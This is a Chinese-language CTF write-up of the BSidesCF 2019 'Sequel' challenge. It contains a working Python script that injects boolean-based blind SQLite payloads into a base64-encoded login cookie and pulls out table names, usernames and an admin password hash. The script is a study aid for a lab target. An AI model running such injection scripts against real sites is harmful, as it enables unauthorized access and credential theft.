[BSidesCF 2019]Sequel

/ 0评 / 0

sqlite注入
登录baopo爆破一下得到用户名 guest guest
然后纠结了一会儿,在cookie中发现了
eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9
这样的文字,解密
{"username":"guest","password":"guest"}
猜测cookie处注入

import requests
import base64
import string
flag = ""
url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels'
for i in range(50):
    for j in string.printable:
        tmp = flag + j
        '''
        #表名
        if j == 'n': continue
        if j == 'r': continue
        if j == 's': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # table_name notes,reviews,sqlite,uSeRiNfo
        '''
        '''
        #username
        if j == 'g': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        #username guest,sequeladmin
        '''
        #password
        payload = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        #password f5ec3af19f0d3679e7d5a148f4ac323d
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get(url, cookies={"1337_AUTH" : payload})
        if "Movie" in r.text:
            flag = tmp
            print(flag)
            break

登录就是flag
对于表来说
CREATE TABLE sqlite_master (
type TEXT, //table
name TEXT, //表名
tbl_name TEXT, //表名
rootpage INTEGER, //不清楚
sql TEXT //建表语句
);

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注